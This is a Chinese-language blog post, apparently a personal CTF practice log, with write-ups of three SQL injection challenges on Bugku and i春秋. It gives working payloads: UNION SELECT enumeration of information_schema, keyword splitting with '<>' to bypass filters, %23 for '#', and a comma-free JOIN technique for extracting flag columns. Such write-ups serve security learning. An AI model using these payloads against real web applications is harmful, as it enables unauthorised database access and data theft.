<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误');
                history.back();
            }
        }
    })();
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="又是一脸懵逼的一天。。  成绩单进去啥也没发现，查看源码没什么收获，看到表单自然就想着SQL注入。正常的输入数字1、2、3都得到结果，尝试1’错误，再试1’—没用，加空格（1’— ）或者1’#正常返回，应该是MYSQL数据库。再尝试数字注入1+1结果返回结果和1一样，应该不是    按数字格式处理。最后尝试注入查询结构。看查询返回的界面应该是有4列（姓名以及三门分数），尝试1’ order by">
<meta property="og:type" content="article">
<meta property="og:title" content="bugku20.09.05">
<meta property="og:url" content="http://yoursite.com/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/index.html">
<meta property="og:site_name" content="renex的杂烩集">
<meta property="og:description" content="又是一脸懵逼的一天。。  成绩单进去啥也没发现，查看源码没什么收获，看到表单自然就想着SQL注入。正常的输入数字1、2、3都得到结果，尝试1’错误，再试1’—没用，加空格（1’— ）或者1’#正常返回，应该是MYSQL数据库。再尝试数字注入1+1结果返回结果和1一样，应该不是    按数字格式处理。最后尝试注入查询结构。看查询返回的界面应该是有4列（姓名以及三门分数），尝试1’ order by">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://yoursite.com/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20134633.jpg?v=1&amp;type=image">
<meta property="og:image" content="http://yoursite.com/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20135806.jpg?v=1&amp;type=image">
<meta property="og:image" content="http://yoursite.com/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20224204.jpg?v=1&amp;type=image">
<meta property="og:image" content="http://yoursite.com/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20224326.jpg?v=1&amp;type=image">
<meta property="article:published_time" content="2020-09-05T05:39:30.000Z">
<meta property="article:modified_time" content="2020-09-05T15:43:27.551Z">
<meta property="article:author" content="renex">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20134633.jpg?v=1&amp;type=image">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/09/05/bugku成绩单/"/>





  <title>bugku20.09.05 | renex的杂烩集</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">renex的杂烩集</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">沉•潜</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="renex">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="renex的杂烩集">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">bugku20.09.05</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-09-05T13:39:30+08:00">
                2020-09-05
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf%E5%88%B7%E9%A2%98%E7%AC%94%E8%AE%B0/" itemprop="url" rel="index">
                    <span itemprop="name">ctf刷题笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  707 字
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  3 分钟
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>又是一脸懵逼的一天。。</p>
<hr>
<p>成绩单<br><img src="/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20134633.jpg?v=1&amp;type=image" alt="输入图片描述"><br>进去啥也没发现，查看源码没什么收获，看到表单自然就想着SQL注入。<br>正常的输入数字1、2、3都得到结果，尝试1’错误，再试1’—没用，加空格（1’— ）或者1’#正常返回，应该是MYSQL数据库。再尝试数字注入1+1结果返回结果和1一样，应该不是    按数字格式处理。<br>最后尝试注入查询结构。看查询返回的界面应该是有4列（姓名以及三门分数），尝试1’ order by 4#返回正常，再试1’ order by 5#没有返回，应该是四列。<br>最后用UNION联合注入，1’ union select null,null,null,null#依然只返回一行，重置union前面的查询，用’ union select 1,2,3,4#有返回。<br><img src="/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20135806.jpg?v=1&amp;type=image" alt="输入图片描述"><br>开始注入查询：<br><code>&#39; union select null,null,null,group_concat(table_name) from information_schema.tables where table_schema=database()#</code><br>得到两个table_name: fl4g,sc<br> <code>&#39; union select null,null,null,group_concat(column_name) from information_schema.columns where table_name=&#39;fl4g&#39;#</code><br> 得到列名skctf_flag<br> <code>&#39; union select null,null,null,skctf_flag from fl4g#</code><br> 得到flag</p>
<hr>
<p>SQL(ichunqiu)<br>题目明确告诉flag在数据库里。<br>id=1’#没有回显，1#可以正常显示，0+1没有回显，用order by查结构显示inj code!,应该是过滤了关键字，用/**/注释依然没有显示，采用&lt;&gt;成功注入，最终在order by 4时没有回显。<br>union联合查询，依然用&lt;&gt;避开select,and等的过滤。发现联合查询的第二个返回结果可以显示<br>注入过程：</p>
<pre><code>1+union+se&lt;&gt;lect+1,database(),3#
</code></pre><p>得到数据库名称sqli</p>
<pre><code>1+union+se&lt;&gt;lect+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema=%27sqli%27#
</code></pre><p>   得到数据库表名info,users</p>
<pre><code>1+union+se&lt;&gt;lect+1,group_concat(column_name),3+from+information_schema.columns+where+table_name=%27info%27#
</code></pre><p>得到列名id,title,flAg_T5ZNdrm</p>
<pre><code>1+union+se&lt;&gt;lect+1,flAg_T5ZNdrm,3+from+sqli.info#
</code></pre><p>得到flag(用users得不到flag)</p>
<hr>
<p>以为SQL勉强入门了，结果。。</p>
<hr>
<p>SQLI<br>(i春秋好难)<br>进去啥也没有，看源代码找到login.php?id=1，进去后显示welcome admin~，似乎非常顺利。开始对id各种注入，发现完全行不通。怕不是假的admin…<br>转到index.php,结果发现出来的网页是b68a89d1c4a097a9d8631b3ac45e8979.php，查看bp的HTTP history，果然发现有个302的响应，进去看到<img src="/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20224204.jpg?v=1&amp;type=image" alt="输入图片描述"><br>看到l0gin.php?id=1进去。<br><img src="/2020/09/05/bugku%E6%88%90%E7%BB%A9%E5%8D%95/%E6%89%B9%E6%B3%A8%202020-09-05%20224326.jpg?v=1&amp;type=image" alt="输入图片描述"><br>奇怪的注入，测试后得到的有用信息是过滤#和’,’以及两列(order by)，#用%23代替即可，’,’在union联合查询中会用，代替方法见<a href="https://drops.blbana.cc/2017/05/20/SQLi-%E2%80%94%E2%80%94-%E9%80%97%E5%8F%B7%EF%BC%8C%E7%A9%BA%E6%A0%BC%EF%BC%8C%E5%AD%97%E6%AE%B5%E5%90%8D%E8%BF%87%E6%BB%A4%E7%AA%81%E7%A0%B4/" target="_blank" rel="noopener">链接</a><br>注入过程：</p>
<p>  <code>0&#39;+union+select+*+from+(select+&#39;a&#39;)a+join+(select+database())b%23</code><br> 得到数据库名sqli</p>
<pre><code>0&#39;+union+select+*+from+(select+&#39;a&#39;)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=&#39;sqli&#39;)b%23
</code></pre><p>得到数据表名users</p>
<pre><code>0&#39;+union+select+*+from+(select+&#39;a&#39;)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name=&#39;users&#39;)b%23
</code></pre><p>得到列名id,username,flag_9c861b688330</p>
<pre><code>0&#39;+union+select+*+from+(select+&#39;a&#39;)a+join+(select+flag_9c861b688330+from+sqli.users)b%23
</code></pre><p>  得到flag</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/09/04/bugku%E7%BD%91%E7%AB%99%E8%A2%AB%E9%BB%91/" rel="next" title="bugku20.09.04">
                <i class="fa fa-chevron-left"></i> bugku20.09.04
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/09/06/%E7%99%BE%E5%BA%A6%E6%9D%AF%E4%B9%9D%E6%9C%88%E5%9C%BAcode/" rel="prev" title="百度杯九月场code-20.09.06">
                百度杯九月场code-20.09.06 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      

      <section class="site-overview-wrap sidebar-panel sidebar-panel-active">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">renex</p>
              <p class="site-description motion-element" itemprop="description">瞎写糊涂账</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">28</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">renex</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  
  


  

  

</body>
</html>
